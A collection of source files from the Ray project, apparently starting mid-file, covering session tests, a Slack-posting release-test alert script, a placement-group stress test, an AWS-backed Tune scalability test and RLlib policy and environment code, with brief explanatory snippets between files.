init_session(lambda: 1, 0)
def test_get_fail(session):
shutdown_session()
with pytest.raises(ValueError):
get_session()
def test_world_rank(session):
assert world_rank() == 0
shutdown_session()
with pytest.raises(ValueError):
world_rank()
def test_train(session):
session.start()
output = session.finish()
assert output == 1
def test_report():
def train():
for i in range(2):
report(loss=i)
init_session(training_func=train, world_rank=0)
session = get_session()
session.start()
assert session.get_next()["loss"] == 0
assert session.get_next()["loss"] == 1
shutdown_session()
with pytest.raises(ValueError):
report(loss=2)
def test_report_fail():
def train():
for i in range(2):
report(i)
return 1
init_session(training_func=train, world_rank=0)
session = get_session()
session.start()
assert session.get_next() is None
with pytest.raises(TypeError):
session.finish()
shutdown_session()
def test_report_after_finish(session):
session.start()
session.finish()
for _ in range(2):
report(loss=1)
assert session.get_next() is None
def test_no_start(session):
with pytest.raises(RuntimeError):
session.get_next()
def test_locking():
"""Tests that report pauses training until fetch_next or finish."""
def train_1():
import _thread
_thread.interrupt_main()
init_session(training_func=train_1, world_rank=0)
session = get_session()
with pytest.raises(KeyboardInterrupt):
session.start()
shutdown_session()
def train_2():
for i in range(2):
report(loss=i)
train_1()
init_session(training_func=train_2, world_rank=0)
session = get_session()
session.start()
time.sleep(3)
with pytest.raises(KeyboardInterrupt):
session.finish()
shutdown_session()
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", "-x", __file__]))
```
#### File: ray/release/alert.py
```python
import argparse
from collections import defaultdict, Counter
from typing import Any, List, Tuple, Mapping, Optional
import datetime
import hashlib
import json
import logging
import os
import requests
import sys
import boto3
from e2e import GLOBAL_CONFIG
from alerts.default import handle_result as default_handle_result
from alerts.rllib_tests import handle_result as rllib_tests_handle_result
from alerts.long_running_tests import handle_result as \
long_running_tests_handle_result
from alerts.tune_tests import handle_result as tune_tests_handle_result
from alerts.xgboost_tests import handle_result as xgboost_tests_handle_result
SUITE_TO_FN = {
"long_running_tests": long_running_tests_handle_result,
"rllib_tests": rllib_tests_handle_result,
"tune_tests": tune_tests_handle_result,
"xgboost_tests": xgboost_tests_handle_result,
}
GLOBAL_CONFIG["RELEASE_AWS_DB_STATE_TABLE"] = "alert_state"
GLOBAL_CONFIG["SLACK_WEBHOOK"] = os.environ.get("SLACK_WEBHOOK", "")
GLOBAL_CONFIG["SLACK_CHANNEL"] = os.environ.get("SLACK_CHANNEL",
"#oss-test-cop")
RESULTS_LIMIT = 120
logger = logging.getLogger()
logger.setLevel(logging.INFO)
handler = logging.StreamHandler(stream=sys.stdout)
formatter = logging.Formatter(fmt="[%(levelname)s %(asctime)s] "
"%(filename)s: %(lineno)d "
"%(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
def maybe_fetch_slack_webhook():
if GLOBAL_CONFIG["SLACK_WEBHOOK"] in [None, ""]:
print("Missing SLACK_WEBHOOK, retrieving from AWS secrets store")
GLOBAL_CONFIG["SLACK_WEBHOOK"] = boto3.client(
"secretsmanager", region_name="us-west-2"
).get_secret_value(
SecretId="arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"release-automation/"
"slack-webhook-Na0CFP")["SecretString"]
def _obj_hash(obj: Any) -> str:
json_str = json.dumps(obj, sort_keys=True, ensure_ascii=True)
sha = hashlib.sha256()
sha.update(json_str.encode())
return sha.hexdigest()
def fetch_latest_alerts(rds_data_client):
schema = GLOBAL_CONFIG["RELEASE_AWS_DB_STATE_TABLE"]
sql = (f"""
SELECT DISTINCT ON (category, test_suite, test_name)
category, test_suite, test_name, last_result_hash,
last_notification_dt
FROM {schema}
ORDER BY category, test_suite, test_name, last_notification_dt DESC
LIMIT {RESULTS_LIMIT}
""")
result = rds_data_client.execute_statement(
database=GLOBAL_CONFIG["RELEASE_AWS_DB_NAME"],
secretArn=GLOBAL_CONFIG["RELEASE_AWS_DB_SECRET_ARN"],
resourceArn=GLOBAL_CONFIG["RELEASE_AWS_DB_RESOURCE_ARN"],
schema=schema,
sql=sql,
)
for row in result["records"]:
category, test_suite, test_name, last_result_hash, \
last_notification_dt = (
r["stringValue"]
if "stringValue" in r else None
for r in row
)
last_notification_dt = datetime.datetime.strptime(
last_notification_dt, "%Y-%m-%d %H:%M:%S")
yield category, test_suite, test_name, last_result_hash, \
last_notification_dt
def fetch_latest_results(rds_data_client,
fetch_since: Optional[datetime.datetime] = None):
schema = GLOBAL_CONFIG["RELEASE_AWS_DB_TABLE"]
sql = (f"""
SELECT DISTINCT ON (category, test_suite, test_name)
created_on, category, test_suite, test_name, status, results,
artifacts, last_logs
FROM {schema} """)
parameters = []
if fetch_since is not None:
sql += "WHERE created_on >= :created_on "
parameters = [
{
"name": "created_on",
"typeHint": "TIMESTAMP",
"value": {
"stringValue": fetch_since.strftime("%Y-%m-%d %H:%M:%S")
},
},
]
sql += "ORDER BY category, test_suite, test_name, created_on DESC "
sql += f"LIMIT {RESULTS_LIMIT}"
result = rds_data_client.execute_statement(
database=GLOBAL_CONFIG["RELEASE_AWS_DB_NAME"],
secretArn=GLOBAL_CONFIG["RELEASE_AWS_DB_SECRET_ARN"],
resourceArn=GLOBAL_CONFIG["RELEASE_AWS_DB_RESOURCE_ARN"],
schema=schema,
sql=sql,
parameters=parameters,
)
for row in result["records"]:
created_on, category, test_suite, test_name, status, results, \
artifacts, last_logs = (
r["stringValue"] if "stringValue" in r else None for r in row)
# Calculate hash before converting strings to objects
result_obj = (created_on, category, test_suite, test_name, status,
results, artifacts, last_logs)
result_json = json.dumps(result_obj)
result_hash = _obj_hash(result_json)
# Convert some strings to python objects
created_on = datetime.datetime.strptime(created_on,
"%Y-%m-%d %H:%M:%S")
results = json.loads(results)
artifacts = json.loads(artifacts)
yield result_hash, created_on, category, test_suite, test_name, \
status, results, artifacts, last_logs
def mark_as_handled(rds_data_client, update: bool, category: str,
test_suite: str, test_name: str, result_hash: str,
last_notification_dt: datetime.datetime):
schema = GLOBAL_CONFIG["RELEASE_AWS_DB_STATE_TABLE"]
if not update:
sql = (f"""
INSERT INTO {schema}
(category, test_suite, test_name,
last_result_hash, last_notification_dt)
VALUES (:category, :test_suite, :test_name,
:last_result_hash, :last_notification_dt)
""")
else:
sql = (f"""
UPDATE {schema}
SET last_result_hash=:last_result_hash,
last_notification_dt=:last_notification_dt
WHERE category=:category AND test_suite=:test_suite
AND test_name=:test_name
""")
rds_data_client.execute_statement(
database=GLOBAL_CONFIG["RELEASE_AWS_DB_NAME"],
parameters=[
{
"name": "category",
"value": {
"stringValue": category
}
},
{
"name": "test_suite",
"value": {
"stringValue": test_suite or ""
}
},
{
"name": "test_name",
"value": {
"stringValue": test_name
}
},
{
"name": "last_result_hash",
"value": {
"stringValue": result_hash
}
},
{
"name": "last_notification_dt",
"typeHint": "TIMESTAMP",
"value": {
"stringValue": last_notification_dt.strftime(
"%Y-%m-%d %H:%M:%S")
},
},
],
secretArn=GLOBAL_CONFIG["RELEASE_AWS_DB_SECRET_ARN"],
resourceArn=GLOBAL_CONFIG["RELEASE_AWS_DB_RESOURCE_ARN"],
schema=schema,
sql=sql,
)
def post_alerts_to_slack(channel: str, alerts: List[Tuple[str, str, str, str]],
non_alerts: Mapping[str, int]):
if len(alerts) == 0:
logger.info("No alerts to post to slack.")
return
markdown_lines = [
f"* {len(alerts)} new release test failures found!*",
"",
]
category_alerts = defaultdict(list)
for (category, test_suite, test_name, alert) in alerts:
category_alerts[category].append(
f" *{test_suite}/{test_name}* failed: {alert}")
for category, alert_list in category_alerts.items():
markdown_lines.append(f"Branch: *{category}*")
markdown_lines.extend(alert_list)
markdown_lines.append("")
total_non_alerts = sum(n for n in non_alerts.values())
non_alert_detail = [f"{n} on {c}" for c, n in non_alerts.items()]
markdown_lines += [
f"Additionally, {total_non_alerts} tests passed successfully "
f"({', '.join(non_alert_detail)})."
]
slack_url = GLOBAL_CONFIG["SLACK_WEBHOOK"]
resp = requests.post(
slack_url,
json={
"text": "\n".join(markdown_lines),
"channel": channel,
"username": "Fail Bot",
"icon_emoji": ":red_circle:",
},
)
print(resp.status_code)
print(resp.text)
def post_statistics_to_slack(channel: str,
alerts: List[Tuple[str, str, str, str]],
non_alerts: Mapping[str, int]):
total_alerts = len(alerts)
category_alerts = defaultdict(list)
for (category, test_suite, test_name, alert) in alerts:
category_alerts[category].append(f"`{test_suite}/{test_name}`")
alert_detail = [f"{len(a)} on {c}" for c, a in category_alerts.items()]
total_non_alerts = sum(n for n in non_alerts.values())
non_alert_detail = [f"{n} on {c}" for c, n in non_alerts.items()]
markdown_lines = [
"*Periodic release test report*", "", f"In the past 24 hours, "
f"*{total_non_alerts}* release tests finished successfully, and "
f"*{total_alerts}* release tests failed."
]
markdown_lines.append("")
if total_alerts:
markdown_lines.append(f"*Failing:* {', '.join(alert_detail)}")
for c, a in category_alerts.items():
markdown_lines.append(f" *{c}*: {', '.join(sorted(a))}")
else:
markdown_lines.append("*Failing:* None")
markdown_lines.append("")
if total_non_alerts:
markdown_lines.append(f"*Passing:* {', '.join(non_alert_detail)}")
else:
markdown_lines.append("*Passing:* None")
slack_url = GLOBAL_CONFIG["SLACK_WEBHOOK"]
resp = requests.post(
slack_url,
json={
"text": "\n".join(markdown_lines),
"channel": channel,
"username": "Fail Bot",
"icon_emoji": ":red_circle:",
},
)
print(resp.status_code)
print(resp.text)
def handle_results_and_get_alerts(
rds_data_client,
fetch_since: Optional[datetime.datetime] = None,
always_try_alert: bool = False,
no_status_update: bool = False):
# First build a map of last notifications
last_notifications_map = {}
for category, test_suite, test_name, last_result_hash, \
last_notification_dt in fetch_latest_alerts(rds_data_client):
last_notifications_map[(category, test_suite,
test_name)] = (last_result_hash,
last_notification_dt)
alerts = []
non_alerts = Counter()
# Then fetch latest results
for result_hash, created_on, category, test_suite, test_name, status, \
results, artifacts, last_logs in fetch_latest_results(
rds_data_client, fetch_since=fetch_since):
key = (category, test_suite, test_name)
try_alert = always_try_alert
if key in last_notifications_map:
# If we have an alert for this key, fetch info
last_result_hash, last_notification_dt = last_notifications_map[
key]
if last_result_hash != result_hash:
# If we got a new result, handle new result
try_alert = True
# Todo: maybe alert again after some time?
else:
try_alert = True
if try_alert:
handle_fn = SUITE_TO_FN.get(test_suite, None)
if not handle_fn:
logger.warning(f"No handle for suite {test_suite}")
alert = default_handle_result(created_on, category, test_suite,
test_name, status, results,
artifacts, last_logs)
else:
alert = handle_fn(created_on, category, test_suite, test_name,
status, results, artifacts, last_logs)
if alert:
logger.warning(
f"Alert raised for test {test_suite}/{test_name} "
f"({category}): {alert}")
alerts.append((category, test_suite, test_name, alert))
else:
logger.debug(
f"No alert raised for test {test_suite}/{test_name} "
f"({category})")
non_alerts[category] += 1
if not no_status_update:
mark_as_handled(rds_data_client, key in last_notifications_map,
category, test_suite, test_name, result_hash,
datetime.datetime.now())
return alerts, non_alerts
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--stats",
action="store_true",
default=False,
help="Finish quickly for training.")
args = parser.parse_args()
maybe_fetch_slack_webhook()
rds_data_client = boto3.client("rds-data", region_name="us-west-2")
if args.stats:
# Only update last 24 hour stats
fetch_since = datetime.datetime.now() - datetime.timedelta(days=1)
alerts, non_alerts = handle_results_and_get_alerts(
rds_data_client,
fetch_since=fetch_since,
always_try_alert=True,
no_status_update=True)
post_statistics_to_slack(GLOBAL_CONFIG["SLACK_CHANNEL"], alerts,
non_alerts)
else:
alerts, non_alerts = handle_results_and_get_alerts(rds_data_client)
post_alerts_to_slack(GLOBAL_CONFIG["SLACK_CHANNEL"], alerts,
non_alerts)
```
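Each suite-specific handler registered in `SUITE_TO_FN` is called with the same positional arguments that `handle_results_and_get_alerts` passes above and returns either an alert message or `None`. The handler below is purely hypothetical and only illustrates that contract; the status value and result key it checks are made up.

```python
# Hypothetical handler following the SUITE_TO_FN call convention used above.
# Returning a string raises an alert; returning None counts the run as passing.
def my_suite_handle_result(created_on, category, test_suite, test_name,
                           status, results, artifacts, last_logs):
    if status != "finished":  # status value is illustrative
        return f"Test did not finish (status: {status})."
    if results.get("time_taken", 0) > 3600:  # result key is illustrative
        return "Test took longer than one hour."
    return None
```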
#### File: stress_tests/workloads/test_placement_group.py
```python
import time
from time import perf_counter
from random import random
import ray
from ray.cluster_utils import Cluster
from ray.util.placement_group import (placement_group, remove_placement_group)
# TODO(sang): Increase the number in the actual stress test.
# This number should be divisible by 3.
resource_quantity = 666
num_nodes = 5
custom_resources = {"pg_custom": resource_quantity}
# Create pg that uses 1 resource of cpu & custom resource.
num_pg = resource_quantity
# TODO(sang): Cluster setup. Remove when running in real clusters.
cluster = Cluster()
nodes = []
for _ in range(num_nodes):
nodes.append(
cluster.add_node(
num_cpus=3, num_gpus=resource_quantity,
resources=custom_resources))
cluster.wait_for_nodes()
ray.init(address=cluster.address)
while not ray.is_initialized():
time.sleep(0.1)
# Scenario 1: Create bunch of placement groups and measure how long it takes.
total_creating_time = 0
total_removing_time = 0
repeat = 1
total_trial = repeat * num_pg
bundles = [{"GPU": 1, "pg_custom": 1}] * num_nodes
# Create and remove placement groups.
for _ in range(repeat):
pgs = []
for i in range(num_pg):
start = perf_counter()
pgs.append(placement_group(bundles, strategy="PACK"))
end = perf_counter()
total_creating_time += (end - start)
ray.get([pg.ready() for pg in pgs])
for pg in pgs:
start = perf_counter()
remove_placement_group(pg)
end = perf_counter()
total_removing_time += (end - start)
# Validate the correctness.
assert ray.cluster_resources()["GPU"] == num_nodes * resource_quantity
assert ray.cluster_resources()["pg_custom"] == num_nodes * resource_quantity
# Scenario 2:
# - Launch 30% of placement group in the driver and pass them.
# - Launch 70% of placement group at each remote tasks.
# - Randomly remove placement groups and schedule tasks and actors.
#
# Goal:
# - Make sure jobs are done without breaking GCS server.
# - Make sure all the resources are recovered after the job is done.
# - Measure the creation latency in the stressful environment.
@ray.remote(num_cpus=0, num_gpus=1, max_calls=0)
def mock_task():
time.sleep(0.1)
return True
@ray.remote(num_cpus=0, num_gpus=1, max_restarts=0)
class MockActor:
def __init__(self):
pass
def ping(self):
pass
@ray.remote(num_cpus=0)
def pg_launcher(pre_created_pgs, num_pgs_to_create):
pgs = []
pgs += pre_created_pgs
for i in range(num_pgs_to_create):
pgs.append(placement_group(bundles, strategy="STRICT_SPREAD"))
pgs_removed = []
pgs_unremoved = []
# Randomly choose placement groups to remove.
for pg in pgs:
if random() < .5:
pgs_removed.append(pg)
else:
pgs_unremoved.append(pg)
tasks = []
max_actor_cnt = 5
actor_cnt = 0
actors = []
# Randomly schedule tasks or actors on placement groups that
# are not removed.
for pg in pgs_unremoved:
# TODO(sang): Comment in this line causes GCS actor management
# failure. We need to fix it.
if random() < .5:
tasks.append(mock_task.options(placement_group=pg).remote())
else:
if actor_cnt < max_actor_cnt:
actors.append(MockActor.options(placement_group=pg).remote())
actor_cnt += 1
# Remove the rest of placement groups.
for pg in pgs_removed:
remove_placement_group(pg)
ray.get([pg.ready() for pg in pgs_unremoved])
ray.get(tasks)
ray.get([actor.ping.remote() for actor in actors])
# Since placement groups are scheduled, remove them.
for pg in pgs_unremoved:
remove_placement_group(pg)
pre_created_num_pgs = round(num_pg * 0.3)
num_pgs_to_create = num_pg - pre_created_num_pgs
pg_launchers = []
for i in range(3):
pre_created_pgs = [
placement_group(bundles, strategy="STRICT_SPREAD")
for _ in range(pre_created_num_pgs // 3)
]
pg_launchers.append(
pg_launcher.remote(pre_created_pgs, num_pgs_to_create // 3))
ray.get(pg_launchers)
assert ray.cluster_resources()["GPU"] == num_nodes * resource_quantity
assert ray.cluster_resources()["pg_custom"] == num_nodes * resource_quantity
ray.shutdown()
print("Avg placement group creating time: "
f"{total_creating_time / total_trial * 1000} ms")
print("Avg placement group removing time: "
f"{total_removing_time / total_trial* 1000} ms")
print("Stress Test succeed.")
```
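For reference, the core lifecycle the stress test above hammers on can be reduced to a few lines. This is only a sketch, assuming a local Ray instance with two CPUs and the same `options(placement_group=...)` API used in the file.

```python
# Minimal sketch of the placement group lifecycle exercised above.
import ray
from ray.util.placement_group import placement_group, remove_placement_group

ray.init(num_cpus=2)

pg = placement_group([{"CPU": 1}], strategy="PACK")
ray.get(pg.ready())  # block until the bundle is reserved


@ray.remote(num_cpus=1)
def f():
    return "scheduled inside the placement group"


print(ray.get(f.options(placement_group=pg).remote()))
remove_placement_group(pg)  # release the reserved resources
ray.shutdown()
```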
#### File: scalability_tests/workloads/test_durable_trainable.py
```python
import argparse
import os
import ray
from ray import tune
from ray.tune.utils.release_test_util import timed_tune_run
def main(bucket):
secrets_file = os.path.join(
os.path.dirname(__file__), "..", "aws_secrets.txt")
if os.path.isfile(secrets_file):
print(f"Loading AWS secrets from file {secrets_file}")
from configparser import ConfigParser
config = ConfigParser()
config.read(secrets_file)
for k, v in config.items():
for x, y in v.items():
var = str(x).upper()
os.environ[var] = str(y)
else:
print("No AWS secrets file found. Loading from boto.")
from boto3 import Session
session = Session()
credentials = session.get_credentials()
current_credentials = credentials.get_frozen_credentials()
os.environ["AWS_ACCESS_KEY_ID"] = current_credentials.access_key
os.environ["AWS_SECRET_ACCESS_KEY"] = current_credentials.secret_key
os.environ["AWS_SESSION_TOKEN"] = current_credentials.token
if all(
os.getenv(k, "") for k in [
"AWS_ACCESS_KEY_ID",
"AWS_SECRET_ACCESS_KEY",
"AWS_SESSION_TOKEN",
]):
print("AWS secrets found in env.")
else:
print("Warning: No AWS secrets found in env!")
ray.init(address="auto")
num_samples = 16
results_per_second = 10 / 60
trial_length_s = 300
max_runtime = 500
timed_tune_run(
name="durable trainable",
num_samples=num_samples,
results_per_second=results_per_second,
trial_length_s=trial_length_s,
max_runtime=max_runtime,
checkpoint_freq_s=10, # Once every 10 seconds
checkpoint_size_b=int(10 * 1000**2), # 10 MB
keep_checkpoints_num=2,
resources_per_trial={"cpu": 2},
sync_config=tune.SyncConfig(
sync_to_driver=False,
upload_dir=f"s3://{bucket}/durable/",
))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--bucket", type=str, help="Bucket name")
args, _ = parser.parse_known_args()
main(args.bucket or "ray-tune-scalability-test")
```
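The ConfigParser branch above simply upper-cases every key in every section of `aws_secrets.txt` and exports it as an environment variable. The snippet below is a hypothetical stand-alone illustration of that loop; the file name, section name, and values are made up.

```python
# Hypothetical stand-alone illustration of the secrets-file handling above:
# every key in every section is upper-cased into an environment variable.
import os
from configparser import ConfigParser

with open("aws_secrets.txt", "w") as f:
    f.write("[aws]\n"
            "aws_access_key_id = EXAMPLE_KEY_ID\n"
            "aws_secret_access_key = EXAMPLE_SECRET\n"
            "aws_session_token = EXAMPLE_TOKEN\n")

config = ConfigParser()
config.read("aws_secrets.txt")
for k, v in config.items():
    for x, y in v.items():
        os.environ[str(x).upper()] = str(y)

print(os.environ["AWS_ACCESS_KEY_ID"])  # EXAMPLE_KEY_ID
```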
#### File: agents/mbmpo/mbmpo_torch_policy.py
```python
import gym
from gym.spaces import Box, Discrete
import logging
from typing import Tuple, Type
import ray
from ray.rllib.agents.maml.maml_torch_policy import setup_mixins, \
maml_loss, maml_stats, maml_optimizer_fn, KLCoeffMixin
from ray.rllib.agents.ppo.ppo_tf_policy import setup_config
from ray.rllib.agents.ppo.ppo_torch_policy import vf_preds_fetches
from ray.rllib.evaluation.postprocessing import compute_gae_for_sample_batch
from ray.rllib.models.catalog import ModelCatalog
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.torch.torch_action_dist import TorchDistributionWrapper
from ray.rllib.policy.policy import Policy
from ray.rllib.policy.policy_template import build_policy_class
from ray.rllib.utils.error import UnsupportedSpaceException
from ray.rllib.utils.framework import try_import_torch
from ray.rllib.utils.torch_ops import apply_grad_clipping
from ray.rllib.utils.typing import TrainerConfigDict
torch, nn = try_import_torch()
logger = logging.getLogger(__name__)
def validate_spaces(policy: Policy, observation_space: gym.spaces.Space,
action_space: gym.spaces.Space,
config: TrainerConfigDict) -> None:
"""Validates the observation- and action spaces used for the Policy.
Args:
policy (Policy): The policy, whose spaces are being validated.
observation_space (gym.spaces.Space): The observation space to
validate.
action_space (gym.spaces.Space): The action space to validate.
config (TrainerConfigDict): The Policy's config dict.
Raises:
UnsupportedSpaceException: If one of the spaces is not supported.
"""
# Only support single Box or single Discrete spaces.
if not isinstance(action_space, (Box, Discrete)):
raise UnsupportedSpaceException(
"Action space ({}) of {} is not supported for "
"MB-MPO. Must be [Box|Discrete].".format(action_space, policy))
# If Box, make sure it's a 1D vector space.
elif isinstance(action_space, Box) and len(action_space.shape) > 1:
raise UnsupportedSpaceException(
"Action space ({}) of {} has multiple dimensions "
"{}. ".format(action_space, policy, action_space.shape) +
"Consider reshaping this into a single dimension Box space "
"or using the multi-agent API.")
def make_model_and_action_dist(
policy: Policy,
obs_space: gym.spaces.Space,
action_space: gym.spaces.Space,
config: TrainerConfigDict) -> \
Tuple[ModelV2, Type[TorchDistributionWrapper]]:
"""Constructs the necessary ModelV2 and action dist class for the Policy.
Args:
        policy (Policy): The Policy that will use the models.
        obs_space (gym.spaces.Space): The observation space.
        action_space (gym.spaces.Space): The action space.
        config (TrainerConfigDict): The Policy's config dict.
Returns:
        ModelV2: The policy ModelV2 to be used by the Policy. Note: A dynamics
            ensemble model is also created in this function and assigned to
            `policy.dynamics_model`.
"""
# Get the output distribution class for predicting rewards and next-obs.
policy.distr_cls_next_obs, num_outputs = ModelCatalog.get_action_dist(
obs_space, config, dist_type="deterministic", framework="torch")
# Build one dynamics model if we are a Worker.
# If we are the main MAML learner, build n (num_workers) dynamics Models
# for being able to create checkpoints for the current state of training.
device = (torch.device("cuda")
if torch.cuda.is_available() else torch.device("cpu"))
policy.dynamics_model = ModelCatalog.get_model_v2(
obs_space,
action_space,
num_outputs=num_outputs,
model_config=config["dynamics_model"],
framework="torch",
name="dynamics_ensemble",
).to(device)
action_dist, num_outputs = ModelCatalog.get_action_dist(
action_space, config, framework="torch")
# Create the pi-model and register it with the Policy.
policy.pi = ModelCatalog.get_model_v2(
obs_space,
action_space,
num_outputs=num_outputs,
model_config=config["model"],
framework="torch",
name="policy_model",
)
return policy.pi, action_dist
# Build a child class of `TorchPolicy`, given the custom functions defined
# above.
MBMPOTorchPolicy = build_policy_class(
name="MBMPOTorchPolicy",
framework="torch",
get_default_config=lambda: ray.rllib.agents.mbmpo.mbmpo.DEFAULT_CONFIG,
make_model_and_action_dist=make_model_and_action_dist,
loss_fn=maml_loss,
stats_fn=maml_stats,
optimizer_fn=maml_optimizer_fn,
extra_action_out_fn=vf_preds_fetches,
postprocess_fn=compute_gae_for_sample_batch,
extra_grad_process_fn=apply_grad_clipping,
before_init=setup_config,
after_init=setup_mixins,
mixins=[KLCoeffMixin])
```
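As a quick sanity check of the space validation above, the hypothetical snippet below shows `validate_spaces()` rejecting a multi-dimensional Box action space; the spaces themselves are made up for the example.

```python
# Hypothetical check: validate_spaces() above rejects a 2D Box action space.
from gym.spaces import Box

try:
    validate_spaces(
        policy=None,  # only used for the error message here
        observation_space=Box(-1.0, 1.0, (4, )),
        action_space=Box(-1.0, 1.0, (2, 2)),
        config={})
except UnsupportedSpaceException as e:
    print("Rejected:", e)
```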
#### File: env/apis/task_settable_env.py
```python
import gym
from typing import List, Any
TaskType = Any # Can be different types depending on env, e.g., int or dict
class TaskSettableEnv(gym.Env):
"""
Extension of gym.Env to define a task-settable Env.
Your env must implement this interface in order to be used with MAML.
For curriculum learning, you can add this API to your env such that
the `env_task_fn` can set the next task as needed.
Supports:
- Sampling from a distribution of tasks for meta-learning.
- Setting the env to any task it supports.
- Getting the current task this env has been set to.
Examples:
>>> env = TaskSettableEnv(...)
>>> ...
>>> Trainer.workers.foreach_env(lambda base_env: base_env.my_prop)
"""
def sample_tasks(self, n_tasks: int) -> List[TaskType]:
"""Samples task of the meta-environment
Args:
n_tasks (int) : number of different meta-tasks needed
Returns:
tasks (list) : an (n_tasks) length list of tasks
"""
raise NotImplementedError
def set_task(self, task: TaskType) -> None:
"""Sets the specified task to the current environment
Args:
task: task of the meta-learning environment
"""
raise NotImplementedError
def get_task(self) -> TaskType:
"""Gets the task that the agent is performing in the current environment
Returns:
task: task of the meta-learning environment
"""
raise NotImplementedError
```
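A minimal, hypothetical implementation of the interface above, where the "task" is simply a goal position; it assumes `TaskSettableEnv` from the file is in scope and is meant only as a sketch, not a real benchmark env.

```python
# A minimal, hypothetical TaskSettableEnv where the "task" is a goal position.
import random

import numpy as np
from gym.spaces import Box


class GoalEnv(TaskSettableEnv):
    def __init__(self, config=None):
        self.observation_space = Box(-1.0, 1.0, (1, ))
        self.action_space = Box(-1.0, 1.0, (1, ))
        self.goal = 0.0

    def sample_tasks(self, n_tasks):
        return [random.uniform(-1.0, 1.0) for _ in range(n_tasks)]

    def set_task(self, task):
        self.goal = task

    def get_task(self):
        return self.goal

    def reset(self):
        return np.zeros(1, dtype=np.float32)

    def step(self, action):
        reward = -abs(float(action[0]) - self.goal)
        return np.zeros(1, dtype=np.float32), reward, True, {}


env = GoalEnv()
env.set_task(env.sample_tasks(5)[0])
print(env.get_task())
```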
#### File: env/wrappers/kaggle_wrapper.py
```python
from copy import deepcopy
from typing import Any, Dict, Optional, Tuple
try:
import kaggle_environments
except (ImportError, ModuleNotFoundError):
pass
import numpy as np
from gym.spaces import Box
from gym.spaces import Dict as DictSpace
from gym.spaces import Discrete, MultiBinary, MultiDiscrete, Space
from gym.spaces import Tuple as TupleSpace
from ray.rllib.env import MultiAgentEnv
from ray.rllib.utils.typing import MultiAgentDict, AgentID
class KaggleFootballMultiAgentEnv(MultiAgentEnv):
"""An interface to the kaggle's football environment.
See: https://github.com/Kaggle/kaggle-environments
"""
def __init__(self, configuration: Optional[Dict[str, Any]] = None) -> None:
"""Initializes a Kaggle football environment.
Args:
configuration (Optional[Dict[str, Any]]): configuration of the
football environment. For detailed information, see:
https://github.com/Kaggle/kaggle-environments/blob/master/kaggle_environments/envs/football/football.json
"""
self.kaggle_env = kaggle_environments.make(
"football", configuration=configuration or {})
self.last_cumulative_reward = None
def reset(self) -> MultiAgentDict:
kaggle_state = self.kaggle_env.reset()
self.last_cumulative_reward = None
return {
f"agent{idx}": self._convert_obs(agent_state["observation"])
for idx, agent_state in enumerate(kaggle_state)
if agent_state["status"] == "ACTIVE"
}
def step(
self, action_dict: Dict[AgentID, int]
) -> Tuple[MultiAgentDict, MultiAgentDict, MultiAgentDict, MultiAgentDict]:
# Convert action_dict (used by RLlib) to a list of actions (used by
# kaggle_environments)
action_list = [None] * len(self.kaggle_env.state)
for idx, agent_state in enumerate(self.kaggle_env.state):
if agent_state["status"] == "ACTIVE":
action = action_dict[f"agent{idx}"]
action_list[idx] = [action]
self.kaggle_env.step(action_list)
# Parse (obs, reward, done, info) from kaggle's "state" representation
obs = {}
cumulative_reward = {}
done = {"__all__": self.kaggle_env.done}
info = {}
for idx in range(len(self.kaggle_env.state)):
agent_state = self.kaggle_env.state[idx]
agent_name = f"agent{idx}"
if agent_state["status"] == "ACTIVE":
obs[agent_name] = self._convert_obs(agent_state["observation"])
cumulative_reward[agent_name] = agent_state["reward"]
done[agent_name] = agent_state["status"] != "ACTIVE"
info[agent_name] = agent_state["info"]
# Compute the step rewards from the cumulative rewards
if self.last_cumulative_reward is not None:
reward = {
agent_id: agent_reward - self.last_cumulative_reward[agent_id]
for agent_id, agent_reward in cumulative_reward.items()
}
else:
reward = cumulative_reward
self.last_cumulative_reward = cumulative_reward
return obs, reward, done, info
def _convert_obs(self, obs: Dict[str, Any]) -> Dict[str, Any]:
"""Convert raw observations
These conversions are necessary to make the observations fall into the
observation space defined below.
"""
new_obs = deepcopy(obs)
if new_obs["players_raw"][0]["ball_owned_team"] == -1:
new_obs["players_raw"][0]["ball_owned_team"] = 2
if new_obs["players_raw"][0]["ball_owned_player"] == -1:
new_obs["players_raw"][0]["ball_owned_player"] = 11
new_obs["players_raw"][0]["steps_left"] = [
new_obs["players_raw"][0]["steps_left"]
]
return new_obs
def build_agent_spaces(self) -> Tuple[Space, Space]:
"""Construct the action and observation spaces
Description of actions and observations:
https://github.com/google-research/football/blob/master/gfootball/doc/observation.md
""" # noqa: E501
action_space = Discrete(19)
# The football field's corners are [+-1., +-0.42]. However, the players
# and balls may get out of the field. Thus we multiply those limits by
# a factor of 2.
xlim = 1. * 2
ylim = 0.42 * 2
num_players: int = 11
xy_space = Box(
np.array([-xlim, -ylim], dtype=np.float32),
np.array([xlim, ylim], dtype=np.float32))
xyz_space = Box(
np.array([-xlim, -ylim, 0], dtype=np.float32),
np.array([xlim, ylim, np.inf], dtype=np.float32))
observation_space = DictSpace({
"controlled_players": Discrete(2),
"players_raw": TupleSpace([
DictSpace({
# ball information
"ball": xyz_space,
"ball_direction": Box(-np.inf, np.inf, (3, )),
"ball_rotation": Box(-np.inf, np.inf, (3, )),
"ball_owned_team": Discrete(3),
"ball_owned_player": Discrete(num_players + 1),
# left team
"left_team": TupleSpace([xy_space] * num_players),
"left_team_direction": TupleSpace(
[xy_space] * num_players),
"left_team_tired_factor": Box(0., 1., (num_players, )),
"left_team_yellow_card": MultiBinary(num_players),
"left_team_active": MultiBinary(num_players),
"left_team_roles": MultiDiscrete([10] * num_players),
# right team
"right_team": TupleSpace([xy_space] * num_players),
"right_team_direction": TupleSpace(
[xy_space] * num_players),
"right_team_tired_factor": Box(0., 1., (num_players, )),
"right_team_yellow_card": MultiBinary(num_players),
"right_team_active": MultiBinary(num_players),
"right_team_roles": MultiDiscrete([10] * num_players),
# controlled player information
"active": Discrete(num_players),
"designated": Discrete(num_players),
"sticky_actions": MultiBinary(10),
# match state
"score": Box(-np.inf, np.inf, (2, )),
"steps_left": Box(0, np.inf, (1, )),
"game_mode": Discrete(7)
})
])
})
return action_space, observation_space
```
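A hypothetical registration sketch, assuming RLlib's `register_env` is available and the optional `kaggle_environments` package is installed, so trainers can refer to the env by a string name:

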